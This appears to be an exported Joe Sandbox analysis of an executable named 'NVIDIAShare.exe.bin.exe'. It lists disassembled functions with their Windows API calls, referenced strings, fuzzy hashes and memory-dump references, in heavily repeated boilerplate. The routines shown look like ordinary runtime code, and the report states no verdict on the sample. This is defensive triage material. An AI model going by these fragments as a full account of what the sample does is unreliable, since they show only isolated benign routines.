Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
String ID: %s%s%u
API String ID: 110358324-1360425832
Opcode ID: 0c0ea83e644ad4615165ca0aeade4673aae32a78bc128b18b27bfe0b96427931
Instruction ID: 2a6ccd115dbcf8699bc6ce260b7aa61646cbd0c5dabdd4af58eddabe270d4c14
Opcode Fuzzy Hash: 0c0ea83e644ad4615165ca0aeade4673aae32a78bc128b18b27bfe0b96427931
Instruction Fuzzy Hash: 3541A8B1940659AADF219B94CD44EEE77FCEB45300F4080A6F989E7049DE798A44CF60

Function 0100BB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0100BB27
GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0100A275,?,?,00000800,?,0100A23A,?,0100755C), ref: 0100BBC5
_wcslen.LIBCMT ref: 0100BC3B

Strings

UNC, xrefs: 0100BBA7
\\?\, xrefs: 0100BB52, 0100BB99, 0100BBF7, 0100BC4E

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: _wcslen$CurrentDirectory
String ID: UNC$\\?\
API String ID: 3341907918-253988292
Opcode ID: b0b66b5bd8b20d0bbfacba301a61c41478c93a00fcbf4c3ee7ee8713044c90e6
Instruction ID: 5968d4eefcf2566524364e8e65dac9968c17bf7c32b67e8de69d086888e5e094
Opcode Fuzzy Hash: b0b66b5bd8b20d0bbfacba301a61c41478c93a00fcbf4c3ee7ee8713044c90e6
Instruction Fuzzy Hash: EA419F3944021BA6EF22AF64CC40EEE77ADBF55390F1044A6F9D4A7294EF74D9908B60

Function 0101B6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 0101B6ED
GetObjectW.GDI32(00000000,00000018,?), ref: 0101B712
DeleteObject.GDI32(00000000), ref: 0101B744
DeleteObject.GDI32(00000000), ref: 0101B767

Part of subcall function 0101A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0101B73D,00000066), ref: 0101A6D5
Part of subcall function 0101A6C2: SizeofResource.KERNEL32(00000000,?,?,?,0101B73D,00000066), ref: 0101A6EC
Part of subcall function 0101A6C2: LoadResource.KERNEL32(00000000,?,?,?,0101B73D,00000066), ref: 0101A703
Part of subcall function 0101A6C2: LockResource.KERNEL32(00000000,?,?,?,0101B73D,00000066), ref: 0101A712
Part of subcall function 0101A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0101B73D,00000066), ref: 0101A72D
Part of subcall function 0101A6C2: GlobalLock.KERNEL32(00000000), ref: 0101A73E
Part of subcall function 0101A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0101A762
Part of subcall function 0101A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0101A7A7
Part of subcall function 0101A6C2: GlobalUnlock.KERNEL32(00000000), ref: 0101A7C6
Part of subcall function 0101A6C2: GlobalFree.KERNEL32(00000000), ref: 0101A7CD

Strings

], xrefs: 0101B71A

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
String ID: ]
API String ID: 1797374341-3352871620
Opcode ID: ae5ecf9b75a10d4d7da9c217500736ffdf6033197dcdf0fb0c075fbf8ff90d59
Instruction ID: 16b712900256b6ea0c26d4577ff3b0f1e10799bc8fd98efc3037b37251e17052
Opcode Fuzzy Hash: ae5ecf9b75a10d4d7da9c217500736ffdf6033197dcdf0fb0c075fbf8ff90d59
Instruction Fuzzy Hash: 9901D636641202A7E72277785D08ABF7AF9BF80662F080050F9C4A729CDF7E8C0946A0

Function 0101D600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 01001316: GetDlgItem.USER32(00000000,00003021), ref: 0100135A
Part of subcall function 01001316: SetWindowTextW.USER32(00000000,010335F4), ref: 01001370

EndDialog.USER32(?,00000001), ref: 0101D64B
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0101D661
SetDlgItemTextW.USER32(?,00000066,?), ref: 0101D675
SetDlgItemTextW.USER32(?,00000068), ref: 0101D684

Strings

RENAMEDLG, xrefs: 0101D618

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: 161be61dd898c24d4190d888df394bb54aa98793f0892a02384ae133e55ce86c
Instruction ID: 3da7e24464a8ba92c67c79d341b1c875edef76f88cc7230921703cb23582bbf6
Opcode Fuzzy Hash: 161be61dd898c24d4190d888df394bb54aa98793f0892a02384ae133e55ce86c
Instruction Fuzzy Hash: AD01F933244310BAE3214FA85E0DF5B7B9CBB5E701F010810F3C5A509DC7AF95048765

Function 01027E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,01027E24,00000000,?,01027DC4,00000000,0103C300,0000000C,01027F1B,00000000,00000002), ref: 01027E93
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 01027EA6
FreeLibrary.KERNEL32(00000000,?,?,?,01027E24,00000000,?,01027DC4,00000000,0103C300,0000000C,01027F1B,00000000,00000002), ref: 01027EC9

Strings

mscoree.dll, xrefs: 01027E8C
CorExitProcess, xrefs: 01027E9E

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: bdce330b80cc37e42e94380c6ad34d1fb2746e514979a0ce2100e0e9e08e0cd5
Instruction ID: 9d8f774f1337a7ca9331fd5aafe7b40034a9611998c0449c968f6364b85c0149
Opcode Fuzzy Hash: bdce330b80cc37e42e94380c6ad34d1fb2746e514979a0ce2100e0e9e08e0cd5
Instruction Fuzzy Hash: 5CF06831900218BBDF219FA5DC49B9EBFBDFF44715F0041A9F845A6254DB3A9E44CBA0

Function 0100F2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0101081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 01010836
Part of subcall function 0101081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0100F2D8,Crypt32.dll,00000000,0100F35C,?,?,0100F33E,?,?,?), ref: 01010858

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0100F2E4
GetProcAddress.KERNEL32(010481C8,CryptUnprotectMemory), ref: 0100F2F4

Strings

CryptUnprotectMemory, xrefs: 0100F2EA
CryptProtectMemory, xrefs: 0100F2DE
Crypt32.dll, xrefs: 0100F2CE

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: d2af7a02f29de3c501a169e9c0e257e1cb74f16cd946a1c11bdb634f8cfd66fe
Instruction ID: 4dc47194e12eb4000521233aebb11717160d793e7e853d70aeab022ca3f212dc
Opcode Fuzzy Hash: d2af7a02f29de3c501a169e9c0e257e1cb74f16cd946a1c11bdb634f8cfd66fe
Instruction Fuzzy Hash: 09E04F70D10B029ED7319B799588B41BAD87F44610F14885DF0DADB645DBB9D0818B50

Function 01022BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 01022CA1
___AdjustPointer.LIBCMT ref: 01022CC4
_abort.LIBCMT ref: 01022D12
___AdjustPointer.LIBCMT ref: 01022D60

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AdjustPointer$_abort
String ID:
API String ID: 2252061734-0
Opcode ID: ef8d6e5f8792956ed721b2ade7b1d68ecd13fa61206d3958992df28c7f00af28
Instruction ID: d77efd25ce6cdc8946388eb885a86333e916e2e7f5dd8850480e39ebe6793ff3
Opcode Fuzzy Hash: ef8d6e5f8792956ed721b2ade7b1d68ecd13fa61206d3958992df28c7f00af28
Instruction Fuzzy Hash: DF510671600326AFEB29AFD8D840BBAB7E4FF54310F24416DED85476A1D772E950CB90

Function 0102BF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0102BF39
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0102BF5C

Part of subcall function 01028E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0102CA2C,00000000,?,01026CBE,?,00000008,?,010291E0,?,?,?), ref: 01028E38

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0102BF82
_free.LIBCMT ref: 0102BF95
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0102BFA4

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 5fa63b5fd0b03ffceafaec370d5b210590d901ffac9b67981e17d3dd9a6d25c8
Instruction ID: 16c463447fe1139e3b3a2d5e9b34ac76e51a92e10dc0e862056522a5c2d1192e
Opcode Fuzzy Hash: 5fa63b5fd0b03ffceafaec370d5b210590d901ffac9b67981e17d3dd9a6d25c8
Instruction Fuzzy Hash: 0D01D476601A317F3761157A5C8CDBB7FBDEEC2AA03140169FA84C6104EA668C0186B0

Function 01029869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,01041030,00000200,010291AD,0102617E,?,?,?,?,0100D984,?,?,?,00000004,0100D710,?), ref: 0102986E
_free.LIBCMT ref: 010298A3
_free.LIBCMT ref: 010298CA
SetLastError.KERNEL32(00000000,01033A34,00000050,01041030), ref: 010298D7
SetLastError.KERNEL32(00000000,01033A34,00000050,01041030), ref: 010298E0

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: e325d32940bd83ef50ce1536558b52985778350a46daa70b2af86d64d333abcd
Instruction ID: 94d8680c7ce6faa034e6ead7d51b6d70e6d318dffdf4a77fe5ba452f01adc7ac
Opcode Fuzzy Hash: e325d32940bd83ef50ce1536558b52985778350a46daa70b2af86d64d333abcd
Instruction Fuzzy Hash: 67012D36244632EBD3333238ACC4A5F26ADFFD167CF280136F5C596181EEB588064230

Function 01010EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 010111CF: ResetEvent.KERNEL32(?), ref: 010111E1
Part of subcall function 010111CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 010111F5

ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 01010F21
CloseHandle.KERNEL32(?,?), ref: 01010F3B
DeleteCriticalSection.KERNEL32(?), ref: 01010F54
CloseHandle.KERNEL32(?), ref: 01010F60
CloseHandle.KERNEL32(?), ref: 01010F6C

Part of subcall function 01010FE4: WaitForSingleObject.KERNEL32(?,000000FF,01011206,?), ref: 01010FEA
Part of subcall function 01010FE4: GetLastError.KERNEL32(?), ref: 01010FF6

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: 1c885d480c9c6eb4fcda13a2ba25f042eb0067a70e54a506de004dde64853db1
Instruction ID: cd916ecec26834747e6e91f96997fdd2ab17f6b7fc3b79949b52777181375708
Opcode Fuzzy Hash: 1c885d480c9c6eb4fcda13a2ba25f042eb0067a70e54a506de004dde64853db1
Instruction Fuzzy Hash: D5014C76500B44EBC7229B65D8C5BC6FBADFB08711F00092DF2EA96558CB7A6984CB90

Function 0102C7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0102C817

Part of subcall function 01028DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0102C896,01033A34,00000000,01033A34,00000000,?,0102C8BD,01033A34,00000007,01033A34,?,0102CCBA,01033A34), ref: 01028DE2
Part of subcall function 01028DCC: GetLastError.KERNEL32(01033A34,?,0102C896,01033A34,00000000,01033A34,00000000,?,0102C8BD,01033A34,00000007,01033A34,?,0102CCBA,01033A34,01033A34), ref: 01028DF4

_free.LIBCMT ref: 0102C829
_free.LIBCMT ref: 0102C83B
_free.LIBCMT ref: 0102C84D
_free.LIBCMT ref: 0102C85F

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 9532f4d4a3fd4affec68d1d70fae4b6a6d33c1f341a884398edff04d5a0c2f93
Instruction ID: c8333c06bd12d0ad7bae8cbed2d8f9fa469a73dc77f445144ff55acd70a39c69
Opcode Fuzzy Hash: 9532f4d4a3fd4affec68d1d70fae4b6a6d33c1f341a884398edff04d5a0c2f93
Instruction Fuzzy Hash: 7DF06232500221ABF670EA6CE584C5B77EDAA107207648C5BF2C8D7515CBB5F880CB60

Function 01011FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 01011FE5
_wcslen.LIBCMT ref: 01011FF6
_wcslen.LIBCMT ref: 01012006
_wcslen.LIBCMT ref: 01012014
CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0100B371,?,?,00000000,?,?,?), ref: 0101202F

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: _wcslen$CompareString
String ID:
API String ID: 3397213944-0
Opcode ID: 20983f28d8e15bd1cbf9ca4333589933f75c208e4875693d2af2679952bc31cb
Instruction ID: dedb9b0371da9c1cdf57d482c1c875e6784c658ef16abffee9ac1bdc85751d4a
Opcode Fuzzy Hash: 20983f28d8e15bd1cbf9ca4333589933f75c208e4875693d2af2679952bc31cb
Instruction Fuzzy Hash: 52F01D32008125BBCF226F51EC08DCE7F26EB44760B218415F69A5E0A1CB76D965D690

Function 01028900 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0102891E

Part of subcall function 01028DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0102C896,01033A34,00000000,01033A34,00000000,?,0102C8BD,01033A34,00000007,01033A34,?,0102CCBA,01033A34), ref: 01028DE2
Part of subcall function 01028DCC: GetLastError.KERNEL32(01033A34,?,0102C896,01033A34,00000000,01033A34,00000000,?,0102C8BD,01033A34,00000007,01033A34,?,0102CCBA,01033A34,01033A34), ref: 01028DF4

_free.LIBCMT ref: 01028930
_free.LIBCMT ref: 01028943
_free.LIBCMT ref: 01028954
_free.LIBCMT ref: 01028965

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 638b2eb3bf9cc3d55d7349f90709da70725f134a2aaa68e9df8c33ecebc40b6e
Instruction ID: 7ff9524b0f86b1994407ebefd027f95ceb16a152c988fe3a02356dbfe374467e
Opcode Fuzzy Hash: 638b2eb3bf9cc3d55d7349f90709da70725f134a2aaa68e9df8c33ecebc40b6e
Instruction Fuzzy Hash: 3AF03479911233ABA666BF28F8004493FE9FB287203044A07F5D89227DC77F4959DB91

Function 010115FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 010117BC
_swprintf.LIBCMT ref: 0101186B

Strings

%s: %s, xrefs: 010117CB
%ls, xrefs: 01011641, 01011657

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: fe065ab3a9cc5eff1da0322037684990a1a80f09f798f740996de3738fee35c5
Instruction ID: d31775acd51c765dfa0a4ea334c43984f661dd46a68a754d96ee2ed87854c4e7
Opcode Fuzzy Hash: fe065ab3a9cc5eff1da0322037684990a1a80f09f798f740996de3738fee35c5
Instruction Fuzzy Hash: D251D535288301F6F62A1AB48D45F7D7676BB19B08F048D46F7C6784E8D9BFA410871A

Function 01027F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe,00000104), ref: 01027FAE
_free.LIBCMT ref: 01028079
_free.LIBCMT ref: 01028083

Strings

C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe, xrefs: 01027FA5, 01027FAC, 01027FDB, 01028013

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe
API String ID: 2506810119-3482315862
